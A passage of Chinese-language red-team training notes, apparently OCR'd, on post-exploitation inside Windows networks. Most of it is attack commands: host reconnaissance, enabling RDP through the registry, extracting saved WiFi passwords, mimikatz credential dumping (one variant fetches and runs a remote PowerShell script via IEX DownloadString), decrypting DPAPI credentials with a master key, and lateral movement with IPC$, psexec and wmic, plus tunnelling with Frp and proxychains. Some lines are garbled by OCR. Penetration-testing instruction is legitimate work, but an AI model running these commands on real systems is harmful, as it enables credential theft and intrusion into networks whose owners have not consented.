据的安全,其资产不亚于暴露外网的资产多,内网信息收集也是非常重要的。

作为红队来讲,突破内网的前提下就是针对于内网的信息收集,内网的资产分布式很广-,不仅
是WEB,甚至开放了各种危险端口,在内网中机器不保证其开防火墙,所以我们可以任由横
穿,假设内网机器大量没有打补J的ms17010漏洞,我们就可以横穿其内网了。

再一方面, 即使内网很安全,当我们收集到密码之后去撞库,测试一下密码是否被重复使用,
也可以实现攻破其他主机。

  • 内网信息搜集隐蔽

在收集内网信息的前提下,我们需要针对管理员的登录时间进行查看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
net user administrator //查看最后登录时间
wevtutil epl security C:\System_log.evtx //保存所有日志信息

ipconfig /all 查询本机IP信息是否多网卡
net user 查看本机有几个账户
query user 查看在线的用户
tasklist /v 显示所有运行的进程
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" 查询系统版本
systeminfo 查看补丁信息
net share 查看共享信息
netsh firewall show config 查看防火墙信息
net statistics workstation 查看开机时间
wmic product get name,version 查看安装软件
net session 查看会话
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 开启远程RDP
net config workstation 查看是否存在域环境
wlan show profiles 查看连接过的WiFi


netsh
wlan
show profiles
show profiles name="" key=clear 显示密码

rdp连接记录
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s


内网主机提权
systeminfo

复制信息到 https://i.hacking8.com/tiquan

内网主机探测及扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
内网穿透-流量代理

● 流量代理出网是将目标机器的内网代理出本机,之后再进行扫描,- -般代理出网的代理大部分都是
socks5、socks4, 流量代理的工具有很多,个人感觉最好的还是Frp比较稳定。
● 内网流量转发


内网区域大小探测
● 我们可以通过arp /a来观察网段的总体情况
● 私有IP地址有10段、172段、 192段, 大小从大到小排序的
● A类地址
10.0.0.0--10.255.255.255
● B类地址
172.16.0.0--172.31.255.255
● C类地址
192.168.0.0--192.168.255.255

内网主机存活检测
使用ping 或nmap
当流量代理出来 可以使用proxychains 去调用nmap进行对目标内网进行扫描

NTscan
进行内网爆破

内网弱口令
备忘脆弱性资产
内网流量嗅探

内网主机密码搜集

mimikatz抓取本机密码

mimikatz是一 款简单且好用的windows密码抓取神器,该软件可帮助用户-键抓取window密
码,操作简单、使用方便。
在域渗透过程中另外一名老师会为大家讲解mimikatz的一-些高级使用,这里只做简单介绍

1
2
3
4
5
mimikatz "privilege:debug" "sekurlsa:logonpasswords" exit	读取本机密码

powershell "IEX (New-Object Net.WebClient).DownloadString(' ');Invoke-Mimikatz -DumpCreds" //powershell方式

powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz
1
2
3
4
5
6
7
8
9
mimikatz获取rdp连接记录密码

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
privilege::debug
dpapi:cred /in:C:\Users\A\AppData\Local\Microsoft\Credentials\CA881006071CB1238C13640450A5B676
寻找GuiMasterKey
sekurlsa::dpapi
dpapi:cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\8781378F7D47006A4FC98D2F8A266F58
/masterkey:1df6b7a86b7aa3238c6899b1b4fd7b4ccba852db9b2ea611bbb7943f34b788f55d27835591ccde1e6c643d9aca724fd495282f5fc92ee80746262d8759b9d23d

内网横向

IPC空连接概述

IPC(Internet Process Connection)是共享"命名管道"的资源。

它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接建
立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。

IPC是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个
连接。NT/2000在提供了ipc功能的同时,在初次安装系统时还打开了默认共享,即所有的逻
辑共享(.,…和系统自录winnt或windows(admin)共享。所有的这些,微软的初衷都是为
了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。

建立空连接命令

net share 查看本机共享
net use \\IP地址"密码" /user:用户名 对其进行空连接
net use \\IP地址/del 删除空连接
net time \\IP地址 查看机器时间

psexec 横向工具

微软提供的一种远程命令行工具
可直接用于对远程主机进行命令交互
psexec.exe -accepteula \\IP -u domain\administrator -p password command

wmic横向

wmic是一 款Windows自带的工具集,
wmic /node: 192.168.200.10 /user:jack /password:a #连接后面拼接wmic命令
process call create“cmd.exe" #启动某一程序

process list brief #查看所有进程